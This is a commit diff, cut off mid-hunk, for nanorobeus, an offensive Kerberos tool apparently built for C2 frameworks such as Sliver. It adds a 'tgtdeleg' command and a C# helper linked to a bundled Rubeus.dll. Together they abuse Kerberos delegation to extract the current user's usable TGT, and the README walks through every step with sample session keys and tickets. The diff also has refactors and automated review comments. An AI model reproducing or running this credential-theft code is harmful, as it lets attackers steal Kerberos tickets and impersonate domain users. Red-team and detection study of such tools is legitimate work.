Projects STRLCPY nanorobeus Commits 18157ac5
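--- a/.gitignore
+++ b/.gitignore
@@ -1 +1,4 @@
 .vscode
+.vs
+bin/
+obj/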
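--- a/Makefile
+++ b/Makefile
@@ -6,11 +6,11 @@
 
 nanorobeus:
  $(CC_x64) source/base64.c source/common.c source/klist.c source/luid.c source/ptt.c source/purge.c \
- source/sessions.c source/entry.c -o dist/$(BOFNAME).x64.exe $(OPTIONS) -l advapi32 -l secur32
+ source/sessions.c source/entry.c source/tgtdeleg.c -o dist/$(BOFNAME).x64.exe $(OPTIONS) -l advapi32 -l secur32
  $(STRIP) --strip-all dist/$(BOFNAME).x64.exe
 
  $(CC_x86) source/base64.c source/common.c source/klist.c source/luid.c source/ptt.c source/purge.c \
- source/sessions.c source/entry.c -o dist/$(BOFNAME).x86.exe $(OPTIONS) -l advapi32 -l secur32
+ source/sessions.c source/entry.c source/tgtdeleg.c -o dist/$(BOFNAME).x86.exe $(OPTIONS) -l advapi32 -l secur32
  $(STRIP) --strip-all dist/$(BOFNAME).x86.exe
 
  $(CC_x64) -c source/entry.c -o dist/$(BOFNAME).x64.o -DBOF $(OPTIONS)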
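--- a/README.md
+++ b/README.md
@@ -18,7 +18,9 @@
 
 **ptt** *\<base64\> [/luid <0x0>]* - import Kerberos ticket into a logon session
 
-**purge** [/luid <0x0>] - purge Kerberos tickets
+**purge** *[/luid <0x0>]* - purge Kerberos tickets
+
+**tgtdeleg** *\<spn\> [\<enc_type_hex\>]* - retrieve a usable TGT for the current user
 
 ## Examples
 Get current logon ID.
@@ -111,6 +113,30 @@
 => nanorobeus64 purge
 
 [+] Successfully purged tickets.
+```
+Retrieve a usable TGT for the current user. First, retrieve AP-REQ blob.
+```
+=> nanorobeus64 tgtdeleg cifs/dc.fortress.local
+
+[+] AP-REQ blob: YIIMNwYJKoZIhvcSAQICAQBuggwmMIIMIqADAgEFoQMCAQ6iBwMFA...(snip)...
+```
+Then determine an encryption type.
+```
+$ TgtDeleg.exe YIIMNwYJKoZIhvcSAQICAQBuggwmMIIMIqADAgEFoQMCAQ6iBwMFA...(snip)...
+[*] Authenticator etype: 0x12 (aes256_cts_hmac_sha1)
+```
+Retrieve a session key.
+```
+=> nanorobeus64 tgtdeleg cifs/dc.fortress.local 0x12
+
+[*] Encryption: AES256_CTS_HMAC_SHA1
+[+] Session key: 1/0kOhaO+7bRVPUABp0q4IFazZDc2l3GOcWYTuL/bDk=
+```
+Finally, specify the session key and retrieve a usable TGT ticket.
+```
+$ TgtDeleg.exe YIIMNwYJKoZIhvcSAQICAQBuggwmMIIMIqADAgEFoQMCAQ6iBwMFA...(snip)... 1/0kOhaO+7bRVPUABp0q4IFazZDc2l3GOcWYTuL/bDk=
+[*] Authenticator etype: 0x12 (aes256_cts_hmac_sha1)
+[*] Ticket: doIFeDCCBXSgAwIBBaEDAgEWooIEcjCCBG5hggRqMIIEZq...(snip)...
 ```
 
 ## Credits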
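--- a/TgtDeleg/Program.cs
+++ b/TgtDeleg/Program.cs
@@ -0,0 +1,115 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Runtime.InteropServices;
+using System.ComponentModel;
+
+using Rubeus;
+
+namespace TgtDeleg
+{
+ class Program
+ {
+ static void Main(string[] args)
+ {
+ try
+ {
+ if (args.Length == 0)
+ {
+ return;
+ }
+
+ byte[] KeberosV5 = { 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x01, 0x02, 0x02 }; // 1.2.840.113554.1.2.2
+ var ClientTokenArray = Convert.FromBase64String(args[0]);
+ var index = Helpers.SearchBytePattern(KeberosV5, ClientTokenArray);
+ if (index > 0)
+ {
+ var startIndex = index += KeberosV5.Length;
+ if ((ClientTokenArray[startIndex] == 1) && (ClientTokenArray[startIndex + 1] == 0))
+ {
+ startIndex += 2;
+ var apReqArray = new byte[ClientTokenArray.Length - startIndex];
+ Buffer.BlockCopy(ClientTokenArray, startIndex, apReqArray, 0, apReqArray.Length);
+ var asn_AP_REQ = Asn1.AsnElt.Decode(apReqArray, false);
+
+ foreach (var elt in asn_AP_REQ.Sub[0].Sub)
+ {
+ if (elt.TagValue == 4)
+ {
+ // build the encrypted authenticator
+ var encAuthenticator = new EncryptedData(elt.Sub[0]);
+ var authenticatorEtype = (Interop.KERB_ETYPE)encAuthenticator.etype;
+ Console.WriteLine("[*] Authenticator etype: 0x{1} ({0})", authenticatorEtype, ((int)authenticatorEtype).ToString("X"));
+ byte[] key;
+ if (args.Length == 2)
+ {
+ key = Convert.FromBase64String(args[1]);
+ }
+ else
+ {
+ return;
+ }
+ var rawBytes = Crypto.KerberosDecrypt(authenticatorEtype, Interop.KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, key, encAuthenticator.cipher);
+ var asnAuthenticator = Asn1.AsnElt.Decode(rawBytes, false);
+
+ foreach (var elt2 in asnAuthenticator.Sub[0].Sub)
+ {
+ if (elt2.TagValue == 3)
+ {
+ var cksumtype = Convert.ToInt32(elt2.Sub[0].Sub[0].Sub[0].GetInteger());
+
+ // check if cksumtype == GSS_CHECKSUM_TYPE
+ if (cksumtype == 0x8003)
+ {
+ var checksumBytes = elt2.Sub[0].Sub[1].Sub[0].GetOctetString();
+
+ // check if the flags include GSS_C_DELEG_FLAG
+ if ((checksumBytes[20] & 1) == 1)
+ {
+ var dLen = BitConverter.ToUInt16(checksumBytes, 26);
+ var krbCredBytes = new byte[dLen];
+ // copy out the krbCredBytes from the checksum structure
+ Buffer.BlockCopy(checksumBytes, 28, krbCredBytes, 0, dLen);
+
+ var asn_KRB_CRED = Asn1.AsnElt.Decode(krbCredBytes, false);
+ Ticket ticket = null;
+ var cred = new KRB_CRED();
+
+ foreach (var elt3 in asn_KRB_CRED.Sub[0].Sub)
+ {
+ if (elt3.TagValue == 2)
+ {
+ // extract the TGT and add it to the KRB-CRED
+ ticket = new Ticket(elt3.Sub[0].Sub[0].Sub[0]);
+ cred.tickets.Add(ticket);
+ }
+ else if (elt3.TagValue == 3)
+ {
+ var enc_part = elt3.Sub[0].Sub[1].GetOctetString();
+ var rawBytes2 = Crypto.KerberosDecrypt(authenticatorEtype, Interop.KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART, key, enc_part);
+ var encKrbCredPartAsn = Asn1.AsnElt.Decode(rawBytes2, false);
+ cred.enc_part.ticket_info.Add(new KrbCredInfo(encKrbCredPartAsn.Sub[0].Sub[0].Sub[0].Sub[0]));
+ }
+ }
+
+ var kirbiBytes = cred.Encode().Encode();
+ var kirbiString = Convert.ToBase64String(kirbiBytes);
+ Console.WriteLine("[*] Ticket: {0}", kirbiString);
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ Console.WriteLine(ex);
+ }
+ }
+ }
+}
+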
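Review bot: The fixed-offset reads of `checksumBytes` at indexes 20, 26 and 28 have no length guard, so a short or malformed GSS checksum ends in an IndexOutOfRangeException/ArgumentException that the outer `catch (Exception)` merely dumps to the console, and the same applies to `ClientTokenArray[startIndex + 1]` right after the OID match. Add `if (checksumBytes.Length < 28) { break; }` before the flag test (the flag byte is at 20, `dLen` at 26) and `if (checksumBytes.Length < 28 + dLen) { break; }` before the `BlockCopy`, and guard the token check with `startIndex + 1 < ClientTokenArray.Length`. Two smaller points: `var startIndex = index += KeberosV5.Length;` mutates `index` as a side effect where `var startIndex = index + KeberosV5.Length;` says what is meant, and both the empty-args path and the missing-key path `return` silently, so a one-line usage message would make the two-step workflow the README describes discoverable from the binary itself.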
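--- a/TgtDeleg/Properties/AssemblyInfo.cs
+++ b/TgtDeleg/Properties/AssemblyInfo.cs
@@ -0,0 +1,37 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("02d739af-1767-4082-8a6b-e60a89aee077")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
+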
  • TgtDeleg/Rubeus.dll
    Binary file.
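--- a/TgtDeleg/TgtDeleg.csproj
+++ b/TgtDeleg/TgtDeleg.csproj
@@ -0,0 +1,51 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+ <PropertyGroup>
+ <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+ <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+ <ProjectGuid>{02D739AF-1767-4082-8A6B-E60A89AEE077}</ProjectGuid>
+ <OutputType>Exe</OutputType>
+ <RootNamespace>TgtDeleg</RootNamespace>
+ <AssemblyName>TgtDeleg</AssemblyName>
+ <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
+ <FileAlignment>512</FileAlignment>
+ <Deterministic>true</Deterministic>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+ <PlatformTarget>AnyCPU</PlatformTarget>
+ <DebugSymbols>true</DebugSymbols>
+ <DebugType>full</DebugType>
+ <Optimize>false</Optimize>
+ <OutputPath>bin\Debug\</OutputPath>
+ <DefineConstants>DEBUG;TRACE</DefineConstants>
+ <ErrorReport>prompt</ErrorReport>
+ <WarningLevel>4</WarningLevel>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+ <PlatformTarget>AnyCPU</PlatformTarget>
+ <DebugType>none</DebugType>
+ <Optimize>true</Optimize>
+ <OutputPath>bin\Release\</OutputPath>
+ <DefineConstants>TRACE</DefineConstants>
+ <ErrorReport>prompt</ErrorReport>
+ <WarningLevel>4</WarningLevel>
+ </PropertyGroup>
+ <ItemGroup>
+ <Reference Include="Rubeus">
+ <HintPath>.\Rubeus.dll</HintPath>
+ </Reference>
+ <Reference Include="System" />
+ <Reference Include="System.Core" />
+ <Reference Include="System.Xml.Linq" />
+ <Reference Include="System.Data.DataSetExtensions" />
+ <Reference Include="Microsoft.CSharp" />
+ <Reference Include="System.Data" />
+ <Reference Include="System.Xml" />
+ </ItemGroup>
+ <ItemGroup>
+ <Compile Include="Program.cs" />
+ <Compile Include="Properties\AssemblyInfo.cs" />
+ </ItemGroup>
+ <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>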
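Review bot: `<HintPath>.\Rubeus.dll</HintPath>` binds the build to a prebuilt binary committed alongside the sources, and nothing in the commit records which Rubeus revision it was built from or a checksum to verify it against, so anyone building TgtDeleg has to trust that DLL blindly. Record the upstream commit and build command in a comment next to the `<Reference Include="Rubeus">` element or in the README, or replace the binary with a project reference built from source. `Program.cs` only uses `Helpers`, `Asn1.AsnElt`, `EncryptedData`, `Crypto`, `Interop`, `Ticket`, `KRB_CRED` and `KrbCredInfo` from it, which may be a small enough surface to vendor as source instead.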
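--- a/TgtDeleg/TgtDeleg.sln
+++ b/TgtDeleg/TgtDeleg.sln
@@ -0,0 +1,26 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.2.32516.85
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TgtDeleg", "TgtDeleg.csproj", "{02D739AF-1767-4082-8A6B-E60A89AEE077}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {02D739AF-1767-4082-8A6B-E60A89AEE077}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {02D739AF-1767-4082-8A6B-E60A89AEE077}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {02D739AF-1767-4082-8A6B-E60A89AEE077}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {02D739AF-1767-4082-8A6B-E60A89AEE077}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {31687E07-23F0-446A-8015-327170CC9FC7}
+ EndGlobalSection
+EndGlobal
+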
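--- a/include/bofdefs.h
+++ b/include/bofdefs.h
@@ -1,16 +1,20 @@
 #pragma once
+#define SECURITY_WIN32
 
 #include <windows.h>
 #include <ntsecapi.h>
 #include <sddl.h>
 #include <tlhelp32.h>
 #include <stdio.h>
+#include <lm.h>
+#include <security.h>
 
 #if defined(BOF) || defined(BRC4)
 
 // kernel32
 WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
 WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(VOID);
+WINBASEAPI VOID WINAPI KERNEL32$SetLastError(DWORD dwErrCode);
 WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime(CONST FILETIME* lpFileTime, LPSYSTEMTIME lpSystemTime);
 WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
 WINBASEAPI WINBOOL WINAPI KERNEL32$Process32FirstW(HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
@@ -31,6 +35,8 @@
 WINBASEAPI void __cdecl MSVCRT$free(void* memblock);
 WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict__ _Dst, const void* __restrict__ _Src, size_t _MaxCount);
 WINBASEAPI void __cdecl MSVCRT$memset(void* dest, int c, size_t count);
+WINBASEAPI int __cdecl MSVCRT$sprintf(char* __restrict__ _Dest, const char* __restrict__ _Format, ...);
+WINBASEAPI size_t __cdecl MSVCRT$mbstowcs(wchar_t * __restrict__ _Dest,const char * __restrict__ _Source,size_t _MaxCount);
 
 // advapi32
 WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
@@ -75,10 +81,23 @@
  PNTSTATUS ProtocolStatus);
 WINBASEAPI NTSTATUS WINAPI SECUR32$LsaDeregisterLogonProcess(HANDLE LsaHandle);
 WINBASEAPI NTSTATUS WINAPI SECUR32$LsaConnectUntrusted(PHANDLE LsaHandle);
+WINBASEAPI SECURITY_STATUS WINAPI SECUR32$AcquireCredentialsHandleA(SEC_CHAR* pszPrincipal, SEC_CHAR* pszPackage,
+ unsigned __LONG32 fCredentialUse, void* pvLogonId,
+ void* pAuthData, SEC_GET_KEY_FN pGetKeyFn,
+ void* pvGetKeyArgument, PCredHandle phCredential,
+ PTimeStamp ptsExpiry);
+WINBASEAPI SECURITY_STATUS WINAPI SECUR32$InitializeSecurityContextA(
+ PCredHandle phCredential, PCtxtHandle phContext, SEC_CHAR* pszTargetName, unsigned __LONG32 fContextReq,
+ unsigned __LONG32 Reserved1, unsigned __LONG32 TargetDataRep, PSecBufferDesc pInput, unsigned __LONG32 Reserved2,
+ PCtxtHandle phNewContext, PSecBufferDesc pOutput, unsigned __LONG32* pfContextAttr, PTimeStamp ptsExpiry);
+WINBASEAPI SECURITY_STATUS WINAPI SECUR32$FreeContextBuffer(void *pvContextBuffer);
+KSECDDDECLSPEC SECURITY_STATUS WINAPI SECUR32$DeleteSecurityContext(PCtxtHandle phContext);
+KSECDDDECLSPEC SECURITY_STATUS WINAPI SECUR32$FreeCredentialsHandle(PCredHandle phCredential);
 #else
 
 #define KERNEL32$GetCurrentProcess GetCurrentProcess
 #define KERNEL32$GetLastError GetLastError
+#define KERNEL32$SetLastError SetLastError
 #define KERNEL32$FileTimeToSystemTime FileTimeToSystemTime
 #define KERNEL32$CreateToolhelp32Snapshot CreateToolhelp32Snapshot
 #define KERNEL32$Process32FirstW Process32FirstW
@@ -98,6 +117,8 @@
 #define MSVCRT$free free
 #define MSVCRT$memcpy memcpy
 #define MSVCRT$memset memset
+#define MSVCRT$sprintf sprintf
+#define MSVCRT$mbstowcs mbstowcs
 
 #define ADVAPI32$OpenProcessToken OpenProcessToken
 #define ADVAPI32$GetTokenInformation GetTokenInformation
@@ -122,4 +143,9 @@
 #define SECUR32$LsaCallAuthenticationPackage LsaCallAuthenticationPackage
 #define SECUR32$LsaDeregisterLogonProcess LsaDeregisterLogonProcess
 #define SECUR32$LsaConnectUntrusted LsaConnectUntrusted
+#define SECUR32$AcquireCredentialsHandleA AcquireCredentialsHandleA
+#define SECUR32$InitializeSecurityContextA InitializeSecurityContextA
+#define SECUR32$FreeContextBuffer FreeContextBuffer
+#define SECUR32$DeleteSecurityContext DeleteSecurityContext
+#define SECUR32$FreeCredentialsHandle FreeCredentialsHandle
 #endif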
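--- a/include/common.h
+++ b/include/common.h
@@ -45,7 +45,6 @@
 NTSTATUS GetLsaHandle(HANDLE hProcessToken, BOOL highIntegrity, HANDLE* hLsa);
 int GetProcessIdByName(WCHAR* processName);
 BOOL ElevateToSystem();
-// BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL
-// bEnablePrivilege);
 char* GetNarrowString(WCHAR* src);
 char* GetNarrowStringFromUnicode(UNICODE_STRING src);
+WCHAR* GetWideString(char* src);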
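--- a/include/tgtdeleg.h
+++ b/include/tgtdeleg.h
@@ -0,0 +1,10 @@
+#pragma once
+
+#include <windows.h>
+#include <lm.h>
+#include "bofdefs.h"
+#include "common.h"
+#include "base64.h"
+
+void execute_tgtdeleg(WCHAR** dispatch, char* spn);
+void execute_tgtdeleg_getkey(WCHAR** dispatch, HANDLE hToken, char* target, LONG encType);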
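--- a/sample_sliver.json
+++ b/sample_sliver.json
@@ -1,6 +1,6 @@
 {
  "name": "nanorobeus",
- "version": "0.0.1",
+ "version": "0.0.2",
  "command_name": "nanorobeus",
  "extension_author": "wavvs",
  "original_author": "wavvs",
@@ -24,7 +24,7 @@
  "arguments": [
  {
  "name": "command",
- "desc": "Command to execute (luid, sessions, klist, dump, ptt, purge, help)",
+ "desc": "Command to execute (luid, sessions, klist, dump, ptt, purge, tgtdeleg, help)",
  "type": "string",
  "optional": false
  },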
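--- a/source/common.c
+++ b/source/common.c
@@ -217,45 +217,12 @@
  return res;
 }
 
-// BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL
-// bEnablePrivilege)
-// {
-// TOKEN_PRIVILEGES tp;
-// LUID luid;
-
-// if (!ADVAPI32$LookupPrivilegeValueA(NULL, lpszPrivilege, &luid))
-// {
-// return FALSE;
-// }
-
-// tp.PrivilegeCount = 1;
-// tp.Privileges[0].Luid = luid;
-// if (bEnablePrivilege)
-// {
-// tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-// }
-// else
-// {
-// tp.Privileges[0].Attributes = 0;
-// }
-
-// if (!ADVAPI32$AdjustTokenPrivileges(hToken, FALSE, &tp,
-// sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
-// {
-// return FALSE;
-// }
-
-// if (KERNEL32$GetLastError() == ERROR_NOT_ALL_ASSIGNED)
-// {
-// return FALSE;
-// }
-
-// return TRUE;
-// }
-
 char* GetNarrowStringFromUnicode(UNICODE_STRING src) {
  int len = src.Length / sizeof(WCHAR);
  char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char));
+ if (dest == NULL) {
+ return "(mem_alloc_error)";
+ }
  MSVCRT$wcstombs(dest, src.Buffer, len);
  dest[len] = '\0';
  return dest;
@@ -264,7 +231,20 @@
 char* GetNarrowString(WCHAR* src) {
  int len = MSVCRT$wcslen(src);
  char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char));
+ if (dest == NULL) {
+ return "(mem_alloc_error)";
+ }
  MSVCRT$wcstombs(dest, src, len);
  dest[len] = '\0';
  return dest;
 }
+
+WCHAR* GetWideString(char* src) {
+ int len = MSVCRT$strlen(src);
+ WCHAR* dest = (WCHAR*)MSVCRT$calloc(len + 1, sizeof(WCHAR));
+ if (dest == NULL) {
+ return NULL;
+ }
+ MSVCRT$mbstowcs(dest, src, len);
+ return dest;
+}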
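Review bot: The new allocation-failure paths in `GetNarrowStringFromUnicode` and `GetNarrowString` return the string literal `"(mem_alloc_error)"`, but on every other path these functions return heap memory the caller owns, so any caller that frees the result (the entry.c hunk shows `MSVCRT$free(cLuid)` in its context, though where `cLuid` comes from is outside that hunk) would free a literal, which is undefined behaviour. Return `NULL` instead, as `GetWideString` in the same hunk already does, and have callers check before use and free. Minor: `GetWideString` discards the return value of `MSVCRT$mbstowcs`, which is `(size_t)-1` on an invalid multibyte sequence; the zero-filled buffer still ends up terminated, so that is tolerable, but a comment such as `// calloc zero-fills, so dest stays NUL-terminated even if mbstowcs fails` would record why.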
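--- a/source/entry.c
+++ b/source/entry.c
@@ -11,6 +11,7 @@
 #include "klist.c"
 #include "base64.c"
 #include "ptt.c"
+#include "tgtdeleg.c"
 #else
 #include "common.h"
 #include "luid.h"
@@ -19,6 +20,7 @@
 #include "klist.h"
 #include "base64.h"
 #include "ptt.h"
+#include "tgtdeleg.h"
 #endif
 
 void execute(WCHAR** dispatch, char* command, char* arg1, char* arg2, char* arg3, char* arg4);
@@ -212,14 +214,38 @@
  MSVCRT$free(cLuid);
  }
  execute_purge(dispatch, hToken, luid, currentLuid);
+ } else if (MSVCRT$strcmp(command, "tgtdeleg") == 0) {
+ char* spn = NULL;
+ int enc = 0;
+ if (MSVCRT$strcmp(arg1, "") != 0) {
+ spn = arg1;
+ } else {
+ goto end;
+ }
+
+ if (MSVCRT$strcmp(arg2, "") != 0) {
+ enc = MSVCRT$strtol(arg2, NULL, 16);
+ if (enc == 0) {
+ PRINT(dispatch, "[!] Specify valid encryption type.\n");
+ goto end;
+ }
+ }
+
+ if (enc == 0) {
+ execute_tgtdeleg(dispatch, spn);
+ } else {
+ PRINT(dispatch, "[*] Encryption: %s\n", GetEncryptionTypeString(enc));
+ execute_tgtdeleg_getkey(dispatch, hToken, spn, enc);
+ }
  } else if (MSVCRT$strcmp(command, "help") == 0) {
- PRINT(dispatch, "[*] nanorobeus 0.0.1\n[*] Command list:\n");
+ PRINT(dispatch, "[*] nanorobeus 0.0.2\n[*] Command list:\n");
  PRINT(dispatch, "\tluid\n");
  PRINT(dispatch, "\tsessions [/luid <0x0> | /all]\n");
  PRINT(dispatch, "\tklist [/luid <0x0> | /all]\n");
  PRINT(dispatch, "\tdump [/luid <0x0> | /all]\n");
  PRINT(dispatch, "\tptt <BASE64> [/luid <0x0>]\n");
  PRINT(dispatch, "\tpurge [/luid <0x0>]\n");
+ PRINT(dispatch, "\ttgtdeleg <SPN> [<ENC_TYPE_HEX>]\n");
  } else {
  PRINT(dispatch, "[!] Unknown command.\n");
  }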
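--- a/source/klist.c
+++ b/source/klist.c
@@ -74,7 +74,7 @@
  } else {
  if (ticketSize > 0) {
  int len = Base64encode_len(ticketSize);
- char* encoded = (char*)MSVCRT$calloc(len, sizeof(char*));
+ char* encoded = (char*)MSVCRT$calloc(len, sizeof(char));
  if (encoded == NULL) {
  PRINT(dispatch, "[!] Base64 - could not allocate memory.\n");
  continue;
@@ -117,10 +117,11 @@
  NTSTATUS status = STATUS_SUCCESS;
  status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, retrieveRequest, responseSize, &retrieveResponse,
  &responseSize, &protocolStatus);
+ MSVCRT$free(retrieveRequest);
  if (NT_SUCCESS(status)) {
  if (NT_SUCCESS(protocolStatus)) {
  if (responseSize > 0) {
- ULONG size = retrieveResponse->Ticket.EncodedTicketSize * sizeof(UCHAR);
+ ULONG size = retrieveResponse->Ticket.EncodedTicketSize;
  PUCHAR returnTicket = (PUCHAR)MSVCRT$calloc(size, sizeof(UCHAR));
  if (returnTicket != NULL) {
  MSVCRT$memcpy(returnTicket, retrieveResponse->Ticket.EncodedTicket, size);
@@ -141,56 +142,32 @@
 }
 
 void PrintTicketFlags(WCHAR** dispatch, ULONG ticketFlags) {
- if ((ticketFlags & KERB_TICKET_FLAGS_forwardable) == KERB_TICKET_FLAGS_forwardable) {
- PRINT(dispatch, "forwardable");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_forwarded) == KERB_TICKET_FLAGS_forwarded) {
- PRINT(dispatch, ", forwarded");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_proxiable) == KERB_TICKET_FLAGS_proxiable) {
- PRINT(dispatch, ", proxiable");
+
+ char* flags[16] = {
+ "name_canonicalize",
+ "anonymous",
+ "ok_as_delegate",
+ "?",
+ "hw_authent",
+ "pre_authent",
+ "initial",
+ "renewable",
+ "invalid",
+ "postdated",
+ "may_postdate",
+ "proxy",
+ "proxiable",
+ "forwarded",
+ "forwardable",
+ "reserved"
+ };
+
+ for (int i = 0; i < 16; i++) {
+ if ((ticketFlags >> (i + 16)) & 1) {
+ PRINT(dispatch, "%s ", flags[i]);
+ }
  }
- if ((ticketFlags & KERB_TICKET_FLAGS_proxy) == KERB_TICKET_FLAGS_proxy) {
- PRINT(dispatch, ", proxy");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_may_postdate) == KERB_TICKET_FLAGS_may_postdate) {
- PRINT(dispatch, ", may_postdate");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_postdated) == KERB_TICKET_FLAGS_postdated) {
- PRINT(dispatch, ", postdated");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_invalid) == KERB_TICKET_FLAGS_invalid) {
- PRINT(dispatch, ", invalid");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_renewable) == KERB_TICKET_FLAGS_renewable) {
- PRINT(dispatch, ", renewable");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_initial) == KERB_TICKET_FLAGS_initial) {
- PRINT(dispatch, ", initial");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_pre_authent) == KERB_TICKET_FLAGS_pre_authent) {
- PRINT(dispatch, ", pre_authent");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_hw_authent) == KERB_TICKET_FLAGS_hw_authent) {
- PRINT(dispatch, ", hw_authent");
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_ok_as_delegate) == KERB_TICKET_FLAGS_ok_as_delegate) {
-#if (_WIN32_WINNT == 0x0501)
- PRINT(dispatch, ", cname_in_pa_data");
-#else
- PRINT(dispatch, ", ok_as_delegate");
-#endif
- }
- if ((ticketFlags & KERB_TICKET_FLAGS_name_canonicalize) == KERB_TICKET_FLAGS_name_canonicalize) {
- PRINT(dispatch, ", name_canonicalize");
- }
- // if ((ticketFlags & KERB_TICKET_FLAGS_enc_pa_rep) ==
- // KERB_TICKET_FLAGS_enc_pa_rep)
- // {
- // PRINT(dispatch, ", enc_pa_rep");
- // }
-
- PRINT(dispatch, " (0x%lx)\n", ticketFlags);
+ PRINT(dispatch, "(0x%lx)\n", ticketFlags);
 }
 
 void PrintTicketInfo(WCHAR** dispatch, KERB_TICKET_CACHE_INFO_EX cacheInfo) {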
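Review bot: The `"?"` entry at index 3 of the new `flags` table in `PrintTicketFlags` is bit 19 (0x00080000), which in the RFC 4120 ticket-flag layout this shift mirrors (RFC bit 12, stored by Windows as bit 31-12) is transited-policy-checked; naming it `"transited_policy_checked"` keeps the output self-describing, though confirm against the `KERB_TICKET_FLAGS_*` values in ntsecapi.h before relying on it. The `(ticketFlags >> (i + 16)) & 1` test is the one non-obvious line of the rewrite and deserves a comment, e.g. `// KERB_TICKET_FLAGS_* live in the high 16 bits of ticketFlags; table index i maps to bit i + 16`. The old code printed `cname_in_pa_data` for 0x00040000 on `_WIN32_WINNT == 0x0501` builds and the table drops that distinction, which is fine if that target is no longer supported but is worth a line in the commit description.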
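--- a/source/luid.c
+++ b/source/luid.c
@@ -18,6 +18,9 @@
  }
 
  LUID* luid = MSVCRT$calloc(1, sizeof(LUID));
+ if (luid == NULL) {
+ return NULL;
+ }
  luid->HighPart = tokenStats.AuthenticationId.HighPart;
  luid->LowPart = tokenStats.AuthenticationId.LowPart;
  return luid;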
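--- a/source/purge.c
+++ b/source/purge.c
@@ -38,16 +38,18 @@
  }
  purgeRequest.RealmName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1};
  purgeRequest.ServerName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1};
- status =
- SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest, sizeof(KERB_PURGE_TKT_CACHE_REQUEST),
- &purgeResponse, &responseSize, &protocolStatus);
+ status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest,
+ sizeof(KERB_PURGE_TKT_CACHE_REQUEST), &purgeResponse, &responseSize, &protocolStatus);
 
- if (!NT_SUCCESS(status) || !NT_SUCCESS(protocolStatus)) {
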